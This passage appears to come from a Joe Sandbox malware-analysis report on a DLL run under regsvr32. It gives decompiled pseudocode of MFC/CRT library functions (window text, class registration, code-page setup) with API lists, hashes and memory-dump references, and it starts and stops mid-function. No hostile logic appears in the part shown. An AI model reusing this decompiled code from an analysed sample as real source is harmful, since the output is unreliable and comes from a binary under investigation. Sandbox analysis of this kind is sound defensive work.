					_push(_t41 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
					_t26 = lstrlenA( *(_t41 + 8));
					E100014B0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
					_t28 = _t26;
				} else {
					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t28;
			}






                                                                                                            0x10020964
                                                                                                            0x10020969
                                                                                                            0x10020971
                                                                                                            0x10020993
                                                                                                            0x1002099b
                                                                                                            0x100209a2
                                                                                                            0x100209a3
                                                                                                            0x100209b2
                                                                                                            0x100209bb
                                                                                                            0x100209c9
                                                                                                            0x100209ce
                                                                                                            0x10020973
                                                                                                            0x1002097c
                                                                                                            0x1002097c
                                                                                                            0x100209d4
                                                                                                            0x100209dc

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10020964
                                                                                                            • GetWindowTextA.USER32 ref: 1002097C
                                                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,1002CC3A,?,00000104,?), ref: 100209B2
                                                                                                            • lstrlenA.KERNEL32(?,?,?,1002CC3A,?,00000104,?), ref: 100209BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3022380644-0
                                                                                                            • Opcode ID: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                                                            • Instruction ID: 9a5806592f70ea17751b7fdaa6094fb832eb62a9ddc39452fd7da2019fb28030
                                                                                                            • Opcode Fuzzy Hash: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                                                            • Instruction Fuzzy Hash: 75019E36900129EFDB05DFA4CC48BAEBBB2FF48314F00C619F512AB262CB719950DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001B66F Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001B66F(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _t12;
				void* _t18;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t19 = _a8;
				_t12 = E1001B64E( *_t20,  *_a8, _t20);
				_t22 = _t21 + 0xc;
				if(_t12 != 0) {
					_t3 = _t20 + 4; // 0x4
					_t18 = E1001B64E( *_t3, 1, _t3);
					_t22 = _t22 + 0xc;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
					}
				}
				_t6 = _t20 + 4; // 0x4
				if(E1001B64E( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
				}
				_t10 = _t20 + 8; // 0x8
				return E1001B64E( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
			}








                                                                                                            0x1001b670
                                                                                                            0x1001b675
                                                                                                            0x1001b67e
                                                                                                            0x1001b683
                                                                                                            0x1001b688
                                                                                                            0x1001b68a
                                                                                                            0x1001b692
                                                                                                            0x1001b697
                                                                                                            0x1001b69c
                                                                                                            0x1001b69e
                                                                                                            0x1001b69e
                                                                                                            0x1001b69c
                                                                                                            0x1001b6a1
                                                                                                            0x1001b6b4
                                                                                                            0x1001b6b6
                                                                                                            0x1001b6b6
                                                                                                            0x1001b6b9
                                                                                                            0x1001b6cc

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ___addl
                                                                                                            • String ID:
                                                                                                            • API String ID: 2260456530-0
                                                                                                            • Opcode ID: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                                                            • Instruction ID: 1cba6355bd62d8335d9ad848ad702df172e9c7a68b0d5ea6ff045fc298979a71
                                                                                                            • Opcode Fuzzy Hash: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                                                            • Instruction Fuzzy Hash: 37F06D7A800A02EFDA548B52DC02EA6B7E9FF65240B004425FD598A031EB32E8A9CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10029B23 Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10029B23(void* __esi, struct HWND__* _a4, CHAR* _a8) {
				intOrPtr _v8;
				char _v264;
				intOrPtr _t10;
				int _t20;

				_t10 =  *0x1004c470; // 0xf3933a06
				_v8 = _t10;
				_t20 = lstrlenA(_a8);
				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
					_t13 = SetWindowTextA(_a4, _a8);
				}
				return E100117AE(_t13, _v8);
			}







                                                                                                            0x10029b2c
                                                                                                            0x10029b35
                                                                                                            0x10029b3e
                                                                                                            0x10029b47
                                                                                                            0x10029b78
                                                                                                            0x10029b78
                                                                                                            0x10029b88

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow$lstrcmplstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 330964273-0
                                                                                                            • Opcode ID: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                                                            • Instruction ID: 93620f556a2fd5ec9caf7d88bc5fd11bb860ddfd3ca1ea698490334ddcd31a8c
                                                                                                            • Opcode Fuzzy Hash: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                                                            • Instruction Fuzzy Hash: 42F04F7690002CAFDF129FA0DD84DDDBBB9EB04380F008111F946DA120D730DE908B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100308EB Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100308EB(void* __ecx, void* __eflags) {
				signed int _t8;
				int _t9;
				void* _t11;
				void* _t12;
				signed int* _t13;
				void* _t14;

				_t12 = __ecx;
				E10030582(__ecx, __eflags, 1);
				ReleaseCapture();
				_t11 = E100220EE(_t14, GetDesktopWindow());
				LockWindowUpdate(0);
				_t13 = _t12 + 0x84;
				_t8 =  *_t13;
				if(_t8 != 0) {
					_t9 = ReleaseDC( *(_t11 + 0x1c),  *(_t8 + 4));
					 *_t13 =  *_t13 & 0x00000000;
					return _t9;
				}
				return _t8;
			}









                                                                                                            0x100308ef
                                                                                                            0x100308f1
                                                                                                            0x100308f6
                                                                                                            0x1003090a
                                                                                                            0x1003090c
                                                                                                            0x10030912
                                                                                                            0x10030918
                                                                                                            0x1003091c
                                                                                                            0x10030924
                                                                                                            0x1003092a
                                                                                                            0x00000000
                                                                                                            0x1003092a
                                                                                                            0x1003092f

                                                                                                            APIs
                                                                                                              • Part of subcall function 10030582: GetStockObject.GDI32(00000000), ref: 10030598
                                                                                                              • Part of subcall function 10030582: InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                                                            • ReleaseCapture.USER32(?,?,1003093E), ref: 100308F6
                                                                                                            • GetDesktopWindow.USER32 ref: 100308FC
                                                                                                            • LockWindowUpdate.USER32(00000000,00000000,?,?,1003093E), ref: 1003090C
                                                                                                            • ReleaseDC.USER32 ref: 10030924
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1260764132-0
                                                                                                            • Opcode ID: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                                                            • Instruction ID: cc833fa3e0bd0d4d25e579e7f05375a90551c712b7101b0f89079a167d1ea1eb
                                                                                                            • Opcode Fuzzy Hash: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                                                            • Instruction Fuzzy Hash: F2E04837500224AFE7225F65DD5DF457A64EF40752F158424F541DE0A3CA75D8D1CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100128A7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 65%
                                                                                                            			E100128A7(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v21;
				signed char _v22;
				struct _cpinfo _v28;
				char _v284;
				char _v540;
				char _v796;
				char _v1308;
				void* __ebp;
				intOrPtr _t42;
				signed int _t45;
				char _t47;
				signed char _t48;
				signed int _t58;
				signed int _t59;
				signed int _t65;
				signed int _t68;
				signed char _t70;
				char _t71;
				signed int _t73;
				signed int _t74;
				signed char* _t78;
				signed char* _t79;
				void* _t81;
				void* _t86;
				void* _t87;

				_t80 = __edi;
				_t63 = __ebx;
				_t42 =  *0x1004c470; // 0xf3933a06
				_v8 = _t42;
				if(GetCPInfo( *0x10050b84,  &_v28) != 1) {
					_t45 = 0;
					__eflags = 0;
					do {
						__eflags = _t45 - 0x41;
						if(_t45 < 0x41) {
							L23:
							__eflags = _t45 - 0x61;
							if(_t45 < 0x61) {
								L26:
								 *(_t45 + 0x10050ba0) = 0;
							} else {
								__eflags = _t45 - 0x7a;
								if(_t45 > 0x7a) {
									goto L26;
								} else {
									 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000020;
									_t68 = _t45 - 0x20;
									goto L22;
								}
							}
						} else {
							__eflags = _t45 - 0x5a;
							if(_t45 > 0x5a) {
								goto L23;
							} else {
								 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000010;
								_t68 = _t45 + 0x20;
								__eflags = _t68;
								L22:
								 *(_t45 + 0x10050ba0) = _t68;
							}
						}
						_t45 = _t45 + 1;
						__eflags = _t45 - 0x100;
					} while (_t45 < 0x100);
				} else {
					_t47 = 0;
					do {
						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
						_t47 = _t47 + 1;
					} while (_t47 < 0x100);
					_t48 = _v22;
					_v284 = 0x20;
					if(_t48 != 0) {
						_push(__ebx);
						_t78 =  &_v21;
						_push(__edi);
						do {
							_t65 =  *_t78 & 0x000000ff;
							_t59 = _t48 & 0x000000ff;
							if(_t59 <= _t65) {
								_t73 = _t65 - _t59 + 1;
								_t74 = _t73 >> 2;
								_t81 = _t86 + _t59 - 0x118;
								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
								_t87 = _t87 + 0x18;
								_t65 = 0;
							}
							_t79 =  &(_t78[1]);
							_t48 =  *_t79;
							_t78 =  &(_t79[1]);
							_t96 = _t48;
						} while (_t48 != 0);
						_pop(_t80);
						_pop(_t63);
					}
					_push(0);
					_push( *0x10050a68);
					_push( *0x10050b84);
					_push( &_v1308);
					_push(0x100);
					_push( &_v284);
					_push(1);
					E1001843D(_t63, _t65, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v540);
					_push(0x100);
					_push( &_v284);
					_push(0x100);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_push(0);
					_push( *0x10050b84);
					_push(0x100);
					_push( &_v796);
					_push(0x100);
					_push( &_v284);
					_push(0x200);
					_push( *0x10050a68);
					E10018081(_t63, _t80, 0x100, _t96);
					_t58 = 0;
					do {
						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
						if((_t70 & 0x00000001) == 0) {
							__eflags = _t70 & 0x00000002;
							if((_t70 & 0x00000002) == 0) {
								 *((char*)(_t58 + 0x10050ba0)) = 0;
							} else {
								 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000020;
								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
								goto L12;
							}
						} else {
							 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000010;
							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
							L12:
							 *((char*)(_t58 + 0x10050ba0)) = _t71;
						}
						_t58 = _t58 + 1;
					} while (_t58 < 0x100);
				}
				return E100117AE(_t45, _v8);
			}





























                                                                                                            0x100128a7
                                                                                                            0x100128a7
                                                                                                            0x100128b0
                                                                                                            0x100128b5
                                                                                                            0x100128d1
                                                                                                            0x100129e4
                                                                                                            0x100129e4
                                                                                                            0x100129e6
                                                                                                            0x100129e6
                                                                                                            0x100129e9
                                                                                                            0x10012a04
                                                                                                            0x10012a04
                                                                                                            0x10012a07
                                                                                                            0x10012a1c
                                                                                                            0x10012a1c
                                                                                                            0x10012a09
                                                                                                            0x10012a09
                                                                                                            0x10012a0c
                                                                                                            0x00000000
                                                                                                            0x10012a0e
                                                                                                            0x10012a0e
                                                                                                            0x10012a17
                                                                                                            0x00000000
                                                                                                            0x10012a17
                                                                                                            0x10012a0c
                                                                                                            0x100129eb
                                                                                                            0x100129eb
                                                                                                            0x100129ee
                                                                                                            0x00000000
                                                                                                            0x100129f0
                                                                                                            0x100129f0
                                                                                                            0x100129f9
                                                                                                            0x100129f9
                                                                                                            0x100129fc
                                                                                                            0x100129fc
                                                                                                            0x100129fc
                                                                                                            0x100129ee
                                                                                                            0x10012a23
                                                                                                            0x10012a24
                                                                                                            0x10012a24
                                                                                                            0x100128d7
                                                                                                            0x100128d7
                                                                                                            0x100128d9
                                                                                                            0x100128d9
                                                                                                            0x100128e0
                                                                                                            0x100128e1
                                                                                                            0x100128e5
                                                                                                            0x100128ea
                                                                                                            0x100128f1
                                                                                                            0x100128f3
                                                                                                            0x100128f4
                                                                                                            0x100128f7
                                                                                                            0x100128f8
                                                                                                            0x100128f8
                                                                                                            0x100128fb
                                                                                                            0x10012900
                                                                                                            0x10012904
                                                                                                            0x10012907
                                                                                                            0x1001290a
                                                                                                            0x1001291d
                                                                                                            0x1001291d
                                                                                                            0x1001291d
                                                                                                            0x1001291d
                                                                                                            0x1001291f
                                                                                                            0x10012920
                                                                                                            0x10012922
                                                                                                            0x10012923
                                                                                                            0x10012923
                                                                                                            0x10012927
                                                                                                            0x10012928
                                                                                                            0x10012928
                                                                                                            0x10012929
                                                                                                            0x1001292b
                                                                                                            0x10012937
                                                                                                            0x1001293d
                                                                                                            0x1001293e
                                                                                                            0x10012945
                                                                                                            0x10012946
                                                                                                            0x10012948
                                                                                                            0x1001294d
                                                                                                            0x1001294f
                                                                                                            0x1001295b
                                                                                                            0x1001295c
                                                                                                            0x1001295d
                                                                                                            0x10012964
                                                                                                            0x10012965
                                                                                                            0x10012966
                                                                                                            0x1001296c
                                                                                                            0x10012971
                                                                                                            0x10012973
                                                                                                            0x1001297f
                                                                                                            0x10012980
                                                                                                            0x10012981
                                                                                                            0x10012988
                                                                                                            0x10012989
                                                                                                            0x1001298e
                                                                                                            0x10012994
                                                                                                            0x1001299c
                                                                                                            0x1001299e
                                                                                                            0x1001299e
                                                                                                            0x100129a9
                                                                                                            0x100129c1
                                                                                                            0x100129c4
                                                                                                            0x100129d6
                                                                                                            0x100129c6
                                                                                                            0x100129c6
                                                                                                            0x100129cd
                                                                                                            0x00000000
                                                                                                            0x100129cd
                                                                                                            0x100129ab
                                                                                                            0x100129ab
                                                                                                            0x100129b2
                                                                                                            0x100129b9
                                                                                                            0x100129b9
                                                                                                            0x100129b9
                                                                                                            0x100129dd
                                                                                                            0x100129de
                                                                                                            0x100129e2
                                                                                                            0x10012a32

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Info
                                                                                                            • String ID: $
                                                                                                            • API String ID: 1807457897-3032137957
                                                                                                            • Opcode ID: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                                                            • Instruction ID: 0aa4f3d34f00a4262c94cc47b2ead2c87a4a0533aa2425fc92cd258cd4020972
                                                                                                            • Opcode Fuzzy Hash: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                                                            • Instruction Fuzzy Hash: 304106B15043AC9FEB55CA68CC95BEE7BA8EF05304F2044E1E981DB162C7708AD5D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10021810 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10021810(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebx;
				void* __ebp;
				void* _t25;
				intOrPtr _t37;
				void* _t38;
				struct HINSTANCE__* _t41;
				CHAR* _t43;

				_t38 = __ecx;
				_t43 = E100373A5() + 0x7c;
				_t25 = E100373B5();
				_t37 = _a8;
				_t41 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37) {
					L4:
					_push(_a16);
					_push(_a12);
					_push(_t37);
					_push(_a4);
					E10012068(_t37, _t38, __eflags, _t43, "Afx:%p:%x:%p:%p:%p", _t41);
					goto L5;
				} else {
					_t49 = _a16 - _t37;
					if(_a16 != _t37) {
						goto L4;
					}
					_push(_a4);
					E10012068(_t37, _t38, _t49, _t43, "Afx:%p:%x", _t41);
					L5:
					if(GetClassInfoA(_t41, _t43,  &_v44) == 0) {
						_v44.style = _a4;
						_v44.lpfnWndProc = DefWindowProcA;
						_v44.cbWndExtra = 0;
						_v44.cbClsExtra = 0;
						_v44.lpszMenuName = 0;
						_v44.hIcon = _a16;
						_t40 = _a12;
						_push( &_v44);
						_v44.hInstance = _t41;
						_v44.hCursor = _t37;
						_v44.hbrBackground = _a12;
						_v44.lpszClassName = _t43;
						if(E10020B9B() == 0) {
							E10028C0C(_t40);
						}
					}
					return _t43;
				}
			}











                                                                                                            0x10021810
                                                                                                            0x10021820
                                                                                                            0x10021823
                                                                                                            0x10021828
                                                                                                            0x1002182d
                                                                                                            0x10021830
                                                                                                            0x10021850
                                                                                                            0x10021850
                                                                                                            0x10021853
                                                                                                            0x10021856
                                                                                                            0x10021857
                                                                                                            0x10021861
                                                                                                            0x00000000
                                                                                                            0x10021837
                                                                                                            0x10021837
                                                                                                            0x1002183a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002183c
                                                                                                            0x10021846
                                                                                                            0x10021869
                                                                                                            0x10021877
                                                                                                            0x1002187f
                                                                                                            0x10021887
                                                                                                            0x1002188c
                                                                                                            0x1002188f
                                                                                                            0x10021892
                                                                                                            0x10021895
                                                                                                            0x10021898
                                                                                                            0x1002189e
                                                                                                            0x1002189f
                                                                                                            0x100218a2
                                                                                                            0x100218a5
                                                                                                            0x100218a8
                                                                                                            0x100218b2
                                                                                                            0x100218b4
                                                                                                            0x100218b4
                                                                                                            0x100218b2
                                                                                                            0x100218bf
                                                                                                            0x100218bf

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassInfo
                                                                                                            • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                            • API String ID: 3534257612-2801496823
                                                                                                            • Opcode ID: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                                                            • Instruction ID: 52b857fe777198d334fd01ba6041a527614e5ef36dd32a96c670ed063e64d698
                                                                                                            • Opcode Fuzzy Hash: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                                                            • Instruction Fuzzy Hash: 77214DB5D00259AFDB01DFA5D8819DEBBF8FF58290F41402AF908E7201E7309A50CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100165C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E100165C9() {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* __esi;
				CHAR* _t10;
				signed int _t16;
				signed int _t22;
				CHAR* _t25;
				signed int _t34;
				intOrPtr _t45;

				_push(_t27);
				_t45 =  *0x10050cac; // 0x1
				if(_t45 == 0) {
					E10012D82();
				}
				 *0x1004f6fc = 0;
				GetModuleFileNameA(0, 0x1004f5f8, 0x104);
				_t10 =  *0x10050cb0; // 0x6b33d8
				 *0x1004f410 = 0x1004f5f8;
				if(_t10 == 0) {
					L4:
					_t25 = 0x1004f5f8;
				} else {
					_t25 = _t10;
					if( *_t10 == 0) {
						goto L4;
					}
				}
				E1001645D(_t25, 0,  &_v12, 0,  &_v8);
				_t40 = _v8 << 2;
				_t16 = E100107B6(_v12 + (_v8 << 2));
				_t34 = _t16;
				if(_t34 != 0) {
					E1001645D(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
					 *0x1004f3f4 = _v8 - 1;
					 *0x1004f3f8 = _t34;
					_t22 = 0;
				} else {
					_t22 = _t16 | 0xffffffff;
				}
				return _t22;
			}













                                                                                                            0x100165cd
                                                                                                            0x100165d3
                                                                                                            0x100165d9
                                                                                                            0x100165db
                                                                                                            0x100165db
                                                                                                            0x100165ec
                                                                                                            0x100165f3
                                                                                                            0x100165f9
                                                                                                            0x10016600
                                                                                                            0x10016606
                                                                                                            0x1001660f
                                                                                                            0x1001660f
                                                                                                            0x10016608
                                                                                                            0x1001660b
                                                                                                            0x1001660d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001660d
                                                                                                            0x1001661d
                                                                                                            0x10016628
                                                                                                            0x1001662e
                                                                                                            0x10016633
                                                                                                            0x1001663a
                                                                                                            0x1001664e
                                                                                                            0x10016658
                                                                                                            0x1001665e
                                                                                                            0x10016664
                                                                                                            0x1001663c
                                                                                                            0x1001663c
                                                                                                            0x1001663c
                                                                                                            0x1001666a

                                                                                                            APIs
                                                                                                            • ___initmbctable.LIBCMT ref: 100165DB
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104,00000000,?,?,?,?,?,1001125B,?,?,?,10011379,?,?), ref: 100165F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName___initmbctable
                                                                                                            • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                            • API String ID: 767393020-3922119987
                                                                                                            • Opcode ID: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                                                            • Instruction ID: 1de5955471f92093fdaebd9574c573a93ec7bfc48d4baa4f39bbab7b9738bcfe
                                                                                                            • Opcode Fuzzy Hash: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                                                            • Instruction Fuzzy Hash: 3F110AB6A04224AFD700CF99DC8599F7BE8EB4A360F21016DF915D7240EA70EE80CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001B190 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E1001B190(void* __ecx, void* __eflags, signed int _a4, long _a8, long _a12, long _a16) {
				long _v8;
				long _v12;
				void* _t21;
				long _t22;
				long _t27;
				signed int _t38;
				signed int _t39;
				signed int _t42;

				_t42 = _a4;
				_v12 = _a8;
				_push(_t38);
				_v8 = _a12;
				_t21 = E1001B08D(_t42);
				_t39 = _t38 | 0xffffffff;
				if(_t21 != _t39) {
